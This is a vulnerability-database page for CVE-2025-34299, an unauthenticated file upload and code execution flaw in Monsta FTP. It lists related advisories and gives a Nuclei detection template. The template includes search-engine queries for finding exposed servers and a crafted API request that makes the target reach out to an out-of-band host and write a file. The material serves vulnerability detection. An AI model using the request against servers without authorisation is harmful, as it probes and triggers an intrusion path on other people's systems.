| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for CVE-2025-34299 | 19 Nov 202500:39 | – | githubexploit | |
| Exploit for Unrestricted Upload of File with Dangerous Type in Monstaftp Monsta_Ftp | 11 Dec 202503:42 | – | githubexploit | |
| CVE-2025-34299 | 7 Nov 202510:26 | – | circl | |
| Monsta FTP 代码问题漏洞 | 7 Nov 202500:00 | – | cnnvd | |
| CVE-2025-34299 | 7 Nov 202513:51 | – | cve | |
| CVE-2025-34299 Monsta FTP <= 2.11 Unauthenticated Arbitrary File Upload | 7 Nov 202513:51 | – | cvelist | |
| EUVD-2025-38247 | 7 Nov 202513:51 | – | euvd | |
| Monsta FTP Vulnerability Exposed Thousands of Servers to Full Takeover | 10 Nov 202510:53 | – | hackread | |
| Monsta FTP downloadFile Remote Code Execution | 27 Nov 202518:57 | – | metasploit | |
| CVE-2025-34299 | 7 Nov 202514:15 | – | nvd |
id: CVE-2025-34299
info:
name: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
author: KrE80r
severity: critical
description: |
Monsta FTP = 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files.
impact: |
Unauthenticated attackers can upload malicious files to execute arbitrary code, potentially compromising the server.
remediation: |
Update to the latest version beyond 2.11.
reference:
- https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/
- https://github.com/advisories/GHSA-42m5-3r2p-wr92
- https://nvd.nist.gov/vuln/detail/CVE-2025-34299
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-34299
epss-score: 0.72667
epss-percentile: 0.99376
cwe-id: CWE-434
metadata:
verified: true
max-request: 2
vendor: monstaftp
product: monsta_ftp
shodan-query: http.title:"Monsta FTP"
fofa-query: title="Monsta FTP"
tags: cve,cve2025,monsta,ftp,rce,unauth,file-upload,intrusive,oast,oob,vkev
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/mftp/"
- "{{BaseURL}}/"
stop-at-first-match: true
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "MonstaFTP")'
condition: and
internal: true
extractors:
- type: regex
name: version
group: 1
regex:
- 'monsta-min-([0-9.]+)\.js'
internal: true
- raw:
- |
POST {{BaseURL}}/mftp/application/api/api.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
request={"connectionType":"ftp","configuration":{"host":"{{interactsh-url}}","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: dsl
dsl:
- 'compare_versions(version, "<= 2.11.2")'
extractors:
- type: kval
kval:
- version
# digest: 4a0a00473045022100da2620b984bce6ec863f05578ce53e8f9123f8d571d646cc38a0c629a42ed58902207ddae0f0ca840c511457c99ad00ab8f9006f18dae72a6fd8be7e3b41b3ed19d4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation